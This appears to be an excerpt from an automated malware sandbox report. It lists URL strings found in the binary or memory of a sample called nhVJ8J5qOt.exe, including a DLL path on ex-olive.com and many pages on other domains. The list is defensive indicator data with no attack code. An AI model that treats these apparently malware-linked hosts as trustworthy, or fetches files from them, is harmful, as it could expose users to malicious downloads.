                  Source: nhVJ8J5qOt.exe, 00000000.00000003.532725762.00000000015C8000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/H
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/J
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.532725762.00000000015C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/a
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/w
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.532725762.00000000015C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/~
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/3
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/g
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.evcpa.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.828815433.00000000047AD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.651017417.00000000076C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/:qF
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.738728504.0000000001556000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/h.dll
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543963268.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/5563209-4053062332-1002
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739131542.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.739131542.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/f
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000158C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/#
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/D
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/S
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/f
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.0000000001556000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnsds.org/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000768C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.738728504.0000000001556000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/W
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/Y
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000768C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/m
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.0000000007697000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/563209-4053062332-1002
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/%E9%98%B2%E7%88%86%E6%97%A0%E7%BA%BFAP.html
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/145.html
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/product.php?class2=7
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/product.php?class2=79
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/showproduct.php?id=25
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/showproduct.php?id=72
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.527457283.0000000007690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/D
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/RA
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/S
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/v
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.0000000001552000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hummer.hu/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hummer.hu//
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iamdirt.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iamdirt.com/l
